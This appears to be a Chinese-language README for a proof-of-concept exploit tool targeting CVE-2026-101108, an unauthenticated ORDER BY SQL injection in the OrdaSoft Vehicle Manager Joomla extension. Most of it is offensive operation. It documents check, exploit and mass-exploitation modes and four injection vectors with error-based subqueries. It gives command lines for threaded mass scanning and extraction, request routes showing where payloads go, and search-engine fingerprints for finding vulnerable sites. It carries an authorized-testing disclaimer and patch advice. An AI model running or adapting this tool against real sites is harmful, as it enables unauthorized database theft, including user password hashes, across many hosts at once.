针对 CVE-2026-101108 的 Python 3 PoC — OrdaSoft Vehicle Manager (Free) Joomla 扩展 ≤ 6.5.7。已在 6.5.8+ 中修复。
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_vehiclemanager |
| File | site/vehiclemanager.php |
| Parameters | order_field、order_direction → ORDER BY(未加引号) |
| Auth | 无(公开分类 / 搜索 / 全部车辆视图) |
| CWE | CWE-89 SQL 注入 |
| CVSS 4.0 | 9.3 严重(Joomla CNA) |
Vehicle Manager (Free) 是 OrdaSoft 提供的 Joomla 扩展,用于展示车辆信息(分类、搜索、全部车辆)。在 6.5.7 及更早版本中,排序参数 order_field 和 order_direction 在 site/vehiclemanager.php 中处理:虽然对输入应用了转义(escaping),但由于该值被放入未加引号的 ORDER BY 表达式中,转义对 SQLi 无效(CNA 说明)。
攻击者无需身份验证即可读取/写入数据库,对 Joomla 用户哈希和站点完整性构成严重风险。请升级至 6.5.8 或更高版本。
典型的 Joomla/PHP 代码可能会让用户输入经过一个“清理器”,为字符串字面量转义引号。但在 ORDER BY 中,列名和表达式不是字符串字面量——排序键是作为 SQL 结构拼接的。攻击者会提供诸如基于错误的子查询之类的表达式,而不是真实的列名。CVE-2026-101108 的 CNA 文本明确记录了这种转义绕过模式。
受影响的匿名前端入口点:
showCategory)search / 相关任务)showVehicles 及类似功能)| 模式 | 行为 |
|---|---|
| check | 指纹识别组件 + manifest 版本,发现 catid/Itemid,确认 SQLi |
| exploit | 通过 ORDER BY 进行基于错误的 EXTRACTVALUE 风格双重查询 |
| mass | --list + -j 用于批量检查或批量提取 |
尝试的注入向量(exploit 中第一个成功者胜出):
order_field GETorder_direction GET(asc,<subquery>)order_field POSTorder_direction POSTJSONL 字段:pocbit、pocbit_catalog、pocbit_page、cve、component。
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| 标志 | 含义 |
|---|---|
--aggressive | 检查模式还会尝试泄露 SELECT VERSION() |
--subquery | 用于基于错误 payload 的内部 SELECT(MySQL) |
--vector | 强制使用四种 ORDER BY 向量之一 |
--exploited-list | 成功利用时以制表符分隔的泄露信息 |
--no-color | 纯 CLI(遵循 NO_COLOR) |
退出码:exploit 模式在 exploited: true 时为 0;check 模式在 exploitable_candidate 时为 0。
分类路由(PoC 追加排序参数):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
PoC 构建的搜索路由基线:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
当可读取时:
/administrator/components/com_vehiclemanager/vehiclemanager.xml版本 ≤ 6.5.7 → likely_vulnerable_version。≥ 6.5.8 → patched_version。
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
将主机导出到 targets.txt(每行一个基础 URL),然后仅对授权资产执行 check → hits → exploit。
与 Real Estate Manager CVE(例如 CVE-2026-100752 / CVE-2026-100753)处于同一披露窗口:多个 OrdaSoft Joomla 扩展获得了 SQLi/XSS 修复。如果你运行 Vehicle Manager,请修补你部署的所有 OrdaSoft 组件。
| CVE | 产品 | 问题 | 修复版本 |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | 未认证 ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | 未认证 ORDER BY SQLi | 6.7.9 |
致谢(CNA):Ala Arfaoui。
com_vehiclemanager SQLi(较旧版本,搜索参数)——与相关组件表面不同但有关联仅限授权安全测试和补丁验证。
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108